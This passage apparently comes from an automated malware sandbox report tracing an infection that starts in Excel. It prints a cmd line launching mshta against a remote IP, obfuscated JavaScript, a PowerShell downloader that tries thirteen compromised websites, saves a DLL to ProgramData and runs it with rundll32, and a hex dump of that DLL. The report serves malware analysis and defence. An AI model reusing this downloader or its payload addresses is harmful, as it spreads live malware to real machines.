7d 18 7f 39 7f 25 7f 33 7f 37 7d 29 7f 44 7d 22 7d 2b 7f 32 7d 2b 7f 33 7f 42 7f 71 7f 79 7d 29 7f 38 7d 2c 7f 25 7f 35 7f 33 7d 18 7f 34 7d 25 7f 32 7f 69 7f 6e 7f 67 7d 22 7f 45 7d 1e 7f 34 7f 36 7f 72 7f 6f 7f 6d 7f 43 7d 1b 7f 38 7f 61 7d 18 7f 32 7d 4b 7f 36 7f 46 7f 64 7f 65 7d 22 7d 37 7f 33 7f 31 7d 29 7d 3b 7d 50 7d 29 7d 59 7f 33 7f 30 7d 22 7d 28 7d 32 7f 66 7d 1b 7f 46 7f 72 7d 56 7d 1e 7f 35 7d 5e 7d 2d 7d 5f 7d 29 7f 42 7d 1b 7d 62 7d 4b 7f 33 7d 21 7f 33 7f 34 7d 29 7f 35 7d
                                                                                                                    Data Ascii: 2b27<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';jP645E8Mp8TPT=new Array();oV511BYRuo2ih=new Array();oV511BYRuo2ih[0]='g%78%69%6E\103%38%38\117' ;jP645E8Mp8TPT[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'%76%61\\162%20}}}9%37})D}"}+2}+3Bqy})8},%53}4}%2ing}"E}46romC}8a}2}K6Fde}"}731})};}P})}Y30}"}(}2f}Fr}V}5}^}-}_})B}}b}K3}!34})5}
                                                                                                                    Jan 28, 2022 21:15:03.108746052 CET3INData Raw: 29 7d 60 7d 32 7f 69 7d 22 7d 6f 7f 32 7d 7e 7d 28 7f 37 7f 42 7d 25 7d 59 7f 37 7d 62 7d 2f 7d 6f 7f 33 7d 2d 7f 37 7d 1d 7f 31 7c 0c 7d 36 7d 18 7d 6c 7f 42 7f 66 7f 75 7d 1b 7f 45 7f 63 7d 25 7d 76 7f 36 7d 28 7d 52 7d 69 7d 1a 7d 23 7d 18 7f
                                                                                                                    Data Ascii: )}`}2i}"}o2}~}(7B}%}Y7}b}/}o3}-7}1|}6}}lBfu}Ec}%}v6}(}R}i}}#}1}53|}72|Bi}E|%}"}Y64o}3ument}C}E}=15}+63}%5|5||84}-}R}T}"||1d}ecu}i5|6}<}C}1l}}K|\'}}o|/}i7}E|@}5|R}E|e|<6|82}D}|a}}?
                                                                                                                    Jan 28, 2022 21:15:03.108766079 CET4INData Raw: 61 78 38 78 3a 7f 72 78 63 7f 23 7f 46 77 11 77 12 77 7a 61 7f 62 7f 61 7f 63 7f 6b 7f 67 7d 48 7d 0f 7f 64 7f 2d 77 0c 7e 48 77 0f 78 3e 78 40 78 42 7f 3e 7f 54 7f 68 7f 65 78 54 7f 6f 7f 75 7f 72 78 4c 7f 20 78 38 7d 54 7f 20 7f 6f 7f 66 7f 20
                                                                                                                    Data Ascii: ax8x:rxc#Fwwwzabackg}H}d-w~Hwx>x@xB>ThexTourxL x8}T of zhis {#gw\'w5w7}Hxcxx5by <b~gxZxTxVxXxKx9w wFCCw#~#~% GuardxmnxxZ~g/wFwDbrw$w& ul~2maxw3ox9wpw<ow>t yw)r wU~&w.exjiwm
                                                                                                                    Jan 28, 2022 21:15:03.108783007 CET6INData Raw: 4a 4c 7d 3b 6a 50 36 34 35 45 38 4d 70 38 54 50 54 5b 30 5d 2b 3d 27 66 7f 3c 7f 61 77 49 78 57 77 5c 27 78 25 78 18 7f 78 78 5b 7d 54 78 38 7e 2d 7e 32 7e 34 78 63 7f 6e 7e 34 7f 65 77 0b 77 4d 77 0e 77 4f 77 11 77 52 78 42 7e 09 7f 72 7f 65 7f
                                                                                                                    Data Ascii: JL};jP645E8Mp8TPT[0]+='f<awIxWw\'x%xxx[}Tx8~-~2~4xcn~4ewwMwwOwwRxB~refx%~p~@/~Bw.pw=v*vX.x8mx)x~Ixtx%_x~.kx1wdwGv"v@wKwx]x_xaxcxew[xhxjxlxnw|xqxsxuxwsxyx{x}xwv"wwwwvPw\rwvTwS0wwwwnwwvRx=x?xAx0>v_.Pw=
                                                                                                                    Jan 28, 2022 21:15:03.108795881 CET7INData Raw: 7f 74 71 19 7f 70 71 1f 72 43 73 61 72 40 7f 6c 74 2a 7f 3b 7f 73 78 21 7f 74 76 31 7f 28 71 47 73 58 78 76 78 7c 7e 5c 27 7f 3a 73 5f 75 41 71 22 71 03 71 25 7c 06 7f 2c 71 5d 71 5f 73 43 7b 1d 71 5e 71 61 71 64 71 63 71 66 7b 1d 75 3e 77 65 7d
                                                                                                                    Data Ascii: tqpqrCsar@lt*;sx!tv1(qGsXxvx|~\':s_uAq"qq%|,q]q_sC{q^qaqdqcqf{u>we}zak;qTw\'2qWs#qYqq[q38,47qyq{|<qy1sD5,9p,{ppqivXaqlqn 3qqs$qzaq#qy(0,qwpqxq~ppppq~|<p\nqkqmaqU4pqspq%pqzq|pypppp!pp#;
                                                                                                                    Jan 28, 2022 21:15:03.108814955 CET8INData Raw: 25 32 30 41 72 5c 31 36 32 5c 31 34 31 79 25 32 38 25 32 39 25 32 43 6c 25 33 30 25 33 44 6e 65 25 37 37 25 32 30 5c 31 30 31 5c 31 36 32 25 37 32 5c 31 34 31 5c 31 37 31 25 32 38 25 32 39 25 32 43 25 34 39 25 36 43 25 33 44 25 33 31 25 33 32 25
                                                                                                                    Data Ascii: %20Ar\162\141y%28%29%2Cl%30%3Dne%77%20\101\162%72\141\171%28%29%2C%49%6C%3D%31%32%38%3B\144\157%7Bl%30%5B\111%6C%5D%3DS%74r%69n\147%2Efro%6D\103ha\162\103\157d\145%28I\154%29%7Dw%68%69%6Ce%28%2D%2D\111%6C%29%3B%49\154%3D%31%32%38%3B\154%31%5B%
                                                                                                                    Jan 28, 2022 21:15:03.108834028 CET10INData Raw: 2a 72 12 6c 3f 6d 0e 6d 31 6e 51 6d 1c 6c 36 6c 4f 6c 3b 6c 2a 72 1a 6c 54 7b 23 6d 16 74 14 6e 5b 6d 7e 6c 42 6c 44 76 58 6c 46 6c 37 76 36 7d 10 76 45 7f 53 7f 69 78 1e 73 37 70 4d 6f 67 6d 22 6f 41 7f 75 7f 75 6e 6b 6d 6c 74 58 72 17 7f 28 7f
                                                                                                                    Data Ascii: *rl?mm1nQml6lOl;l*rlT{#mtn[m~lBlDvXlFl7v6}vESixs7pMogm"oAuunkmltXr(jsXx.oMzhn\\v-}IqKdpBDnvluxov|5qKoIo6l=sXo=s5}}As9s;nRs>s@(l~oOfx:or*25+znfl\rw\'{kks9ksKk!d*nzar\'tSos[ouKk8k:=ol:t4kl]k7k=k<k>;t^t
                                                                                                                    Jan 28, 2022 21:15:03.108846903 CET11INData Raw: 13 69 51 78 73 6c 4b 78 19 7f 2e 7e 3e 7f 69 75 3d 67 46 67 51 7f 28 7f 38 67 5b 67 57 67 6b 79 6c 7f 34 67 55 67 23 7f 22 78 71 7e 7d 69 4a 78 7c 77 77 7f 48 7f 44 72 6e 7f 67 72 6e 77 32 78 49 7f 43 6c 14 7f 65 68 4f 7f 6a 68 53 6f 7a 67 4e 7f
                                                                                                                    Data Ascii: iQxslKx.~>iu=gFgQ(8g[gWgkyl4gUg#"xq~}iJx|wwHDrngrnw2xIClehOjhSozgN)iJfdfggdsw{fgY(gk49gUgofffgXsKz=xgVfffff#ff\'fsKfrgkf)ff0f(f|=f"f+r0r\r+gp1grf3sKsr5f1fgqf.fDf9fCf@08fFfJfLf?rriJg{g}g.R}
                                                                                                                    Jan 28, 2022 21:15:03.108861923 CET12INData Raw: 71 4f 69 55 47 51 4b 4f 74 68 6c 53 4f 77 4f 27 20 20 20 3b 6f 34 4c 73 70 75 6b 6c 5a 43 52 69 55 59 74 79 32 61 70 30 62 20 20 28 6f 58 31 4d 30 32 38 62 6d 78 46 49 29 3b 64 34 44 49 53 20 20 20 28 6f 58 31 4d 30 32 38 62 6d 78 46 49 29 3b 69
                                                                                                                    Data Ascii: qOiUGQKOthlSOwO' ;o4LspuklZCRiUYty2ap0b (oX1M028bmxFI);d4DIS (oX1M028bmxFI);iUYty2ap0bo4LspuklZCR (iwiD3bm5);wWSF2fibwpruh46Xp='wkCePF42bQKe1QaeQH4sSd414' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));ayQvTD7
                                                                                                                    Jan 28, 2022 21:15:03.108875990 CET12INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    1192.168.2.224916691.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:15:07.666040897 CET12OUTGET /ee/ss/se.png HTTP/1.1
                                                                                                                    Host: 91.240.118.172
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:15:07.729461908 CET14INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.2
                                                                                                                    Date: Fri, 28 Jan 2022 20:15:07 GMT
                                                                                                                    Content-Type: image/png
                                                                                                                    Content-Length: 1355
                                                                                                                    Connection: keep-alive
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 09:57:38 GMT
                                                                                                                    ETag: "54b-5d6a176fe2880"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 4a 6f 6f 7d 3a 5c 7b 4a 6f 6f 7d 50 72 6f 67 7b 4a 6f 6f 7d 72 61 6d 44 7b 4a 6f 6f 7d 61 74 61 5c 4d 7b 4a 6f 6f 7d 69 6c 6f 73 73 64 2e 7b 4a 6f 6f 7d 64 6c 7b 4a 6f 6f 7d 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 4a 6f 6f 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 74 61 6d 69 6c 61 64 73 65 6e 73 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 42 45 41 44 76 71 47 67 65 6d 56 38 53 6e 54 58 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 6e 63 68 65 73 74 65 72 68 65 61 74 69 6e 67 73 65 72 76 69 63 65 73 2e 79 6f 75 70 72 6f 63 6f 6e 74 61 63 74 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 41 69 4b 31 39 75 4d 66 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 74 75 6e 62 72 69 64 67 65 73 65 72 76 69 63 65 73 2e 63 6f 6d 2f 6a 66 6f 65 71 68 78 7a 2f 7a 4f 58 30 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6d 79 70 75 72 65 61 6c 73 79 73 74 65 6d 2e 63 6f 6d 2f 41 70 70 5f 53 74 61 72 74 2f 52 68 68 38 6c 4b 4f 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 69 6d 61 67 69 6e 61 72 69 75 6d 73 74 6f 72 65 2e 66 75 6e 2f 6e 63 73 62 2f 63 79 47 6f 54 59 71 4d 6d 63 52 77 76 71 64 72 65 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 65 6e 67 61 7a 2e 73 68 6f 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 4d 4f 6c 6c 71 55 6d 32 6e 62 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 65 63 6f 62 61 62 79 2e 70 69 2d 64 68 2e 63 6f 6d 2f 53 65 72 65 6e 64 69 62 2f 67 6c 31 68 63 65 66 39 59 33 47 53 54 43 44 43 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 33 2d 66 61 73 65 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 33 42 6c 30 68 42 62 57 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 73 3a 2f 2f 76 6e 2e 6d 69 6e 69 6e 6f 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 33 57 51 61 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6c 61 73 74 72 65 67 61 72 69 73 74 6f 72 61 6e 74 65 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 66 66 64 43 37 45 6c 4d 32 42 6e 32 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 6f 6e 65 78 6f 6e 65 2e 65 6c 65 6d 65 6e 74 6f 72 2e 63 6c 6f 75 64 2f 63 64 72 78 68 72 74 2f 75 56 45 30 75 56 48 4f 7a 35 45 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6f 63 75 6c 75 73 76 69 73 69 6f 6e 63 61 72 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 5a 45 59 44 6a 6f 73 62 4e 45 78 46 54 64 75 2f 27 3b 0d 0a 24 75 72 6c 31 33 20 3d 20 27 68 74 74 70 3a 2f 2f 64 65 76 62 68 6f 6f 6d 69 67 61 75 73 68 61 6c 61 2e 6f 72 67 2f 47 65 74 61 65 2f 56 79 6f 35 72 72 4e 4c 41 67 64 30 51 78 58 76 6b 76 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 2c 24 75 72 6c 31 33 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20
                                                                                                                    Data Ascii: $path = "C{Joo}:\{Joo}Prog{Joo}ramD{Joo}ata\M{Joo}ilossd.{Joo}dl{Joo}l".replace('{Joo}','');$url1 = 'http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/';$url2 = 'http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/';$url3 = 'http://tunbridgeservices.com/jfoeqhxz/zOX0/';$url4 = 'https://mypurealsystem.com/App_Start/Rhh8lKO/';$url5 = 'http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/';$url6 = 'http://engaz.shop/wp-content/MOllqUm2nb/';$url7 = 'https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/';$url8 = 'http://3-fasen.com/wp-content/3Bl0hBbW/';$url9 = 'https://vn.minino.com/wp-admin/c3WQa/';$url10 = 'https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/';$url11 = 'http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/';$url12 = 'https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/';$url13 = 'http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try {
                                                                                                                    Jan 28, 2022 21:15:07.729482889 CET14INData Raw: 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b
                                                                                                                    Data Ascii: $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -s 3;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\Miloss


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    2192.168.2.2249167136.0.111.1580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:15:07.946124077 CET15OUTGET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1
                                                                                                                    Host: tamiladsense.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:15:08.091576099 CET16INHTTP/1.1 200 OK
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Set-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 20:15:08 GMT
                                                                                                                    Expires: Fri, 28 Jan 2022 20:15:08 GMT
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Content-Disposition: attachment; filename="XrEtCt.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Content-Length: 557056
                                                                                                                    Date: Fri, 28 Jan 2022 20:15:08 GMT
                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PELa!P `]@-R4Pv 0N@`@.text9EP `.rdata``@@.datae000@.rsrcPv`@@.relocv @B
                                                                                                                    Jan 28, 2022 21:15:08.091607094 CET18INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:15:08.091629982 CET19INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:15:08.091651917 CET20INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:15:08.091674089 CET22INData Raw: 8b 00 83 e8 10 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 6a 00 6a 64 8b 4d fc e8 6c 59 01 00 8b 45 fc c7 00 64 68 04 10 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 08 50 8b
                                                                                                                    Data Ascii: ]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>dPQE3PEdMEPjfMXEMiMx#EMO"EM
                                                                                                                    Jan 28, 2022 21:15:08.091696024 CET23INData Raw: f8 03 55 f4 8a 02 88 01 eb dd 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 7d 08 00 74 11 68 00 80 00 00 6a 00 8b 45 08 50 ff 15 c0 62 04 10 5d c3 cc cc cc cc 55 8b ec 51 6a 04 68 00 30 00 00 8b 45 08 50 6a 00 ff 15 bc 62 04
                                                                                                                    Data Ascii: U]U}thjEPb]UQjh0EPjbEE]U}tEPEM;MrE>URE}t&}t EPMQUREPPE]USEEMMU
                                                                                                                    Jan 28, 2022 21:15:08.091717958 CET24INData Raw: d8 76 48 8b 55 e4 8b 42 24 25 00 00 00 02 74 0b 8b 4d f4 81 e1 00 00 00 02 75 13 8b 55 e4 8b 45 f4 0b 42 24 25 ff ff ff fd 89 45 f4 eb 0c 8b 4d e4 8b 55 f4 0b 51 24 89 55 f4 8b 45 dc 03 45 e0 2b 45 e8 89 45 f0 e9 54 ff ff ff 8d 4d e8 51 8b 55 08
                                                                                                                    Data Ascii: vHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUREPMhu3]UMEHMUEM9uAUEEMQU
                                                                                                                    Jan 28, 2022 21:15:08.091739893 CET26INData Raw: f4 0f b7 02 3d 4d 5a 00 00 74 12 68 c1 00 00 00 ff 15 b8 62 04 10 33 c0 e9 c5 03 00 00 8b 4d f4 8b 51 3c 81 c2 f8 00 00 00 52 8b 45 0c 50 8b 4d a0 e8 a2 f6 ff ff 85 c0 75 07 33 c0 e9 a1 03 00 00 8b 4d f4 8b 55 08 03 51 3c 89 55 b4 8b 45 b4 81 38
                                                                                                                    Data Ascii: =MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WEH8thb3:UBMTUEH8MEUUE(EMQ9Us6Exu
                                                                                                                    Jan 28, 2022 21:15:08.091763020 CET27INData Raw: c7 45 ec 01 00 00 00 eb 02 eb ad 83 7d ec 00 75 0c 6a 7f ff 15 b8 62 04 10 33 c0 eb 29 8b 4d fc 8b 55 f8 3b 51 14 76 0c 6a 7f ff 15 b8 62 04 10 33 c0 eb 12 8b 45 fc 8b 4d f0 03 48 1c 8b 55 f8 8b 45 f0 03 04 91 8b e5 5d c2 08 00 cc cc 55 8b ec 83
                                                                                                                    Data Ascii: E}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQUUzt\EEEMU;Q}0EHU<tEH(QUBMREH$UBP|
                                                                                                                    Jan 28, 2022 21:15:08.091785908 CET28INData Raw: 0f af 0d cc 30 05 10 03 d1 8b 0d cc 30 05 10 0f af 0d c8 30 05 10 2b d1 2b 15 cc 30 05 10 2b 15 c8 30 05 10 8b 0d cc 30 05 10 0f af 0d bc 30 05 10 03 15 c8 30 05 10 03 ca 03 0d c8 30 05 10 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 03 ca 2b 0d c0 30
                                                                                                                    Data Ascii: 000++0+0000000+000000++0+0000000+000000++0+000
                                                                                                                    Jan 28, 2022 21:15:08.230431080 CET30INData Raw: ca a1 c0 30 05 10 0f af 05 cc 30 05 10 0f af 05 bc 30 05 10 2b c8 2b 0d cc 30 05 10 8b 15 c0 30 05 10 0f af 15 c8 30 05 10 0f af 15 cc 30 05 10 0f af 15 bc 30 05 10 2b ca 2b 0d cc 30 05 10 03 0d c4 30 05 10 2b 0d c8 30 05 10 a1 c4 30 05 10 0f af
                                                                                                                    Data Ascii: 000++00000++00+000+00+0+000+0000+00+000++00000++00+0


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:21:14:15
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13f560000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:21:14:16
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                                                                                                                    Imagebase:0x4a030000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:21:14:17
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                                                                                                                    Imagebase:0x4a030000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
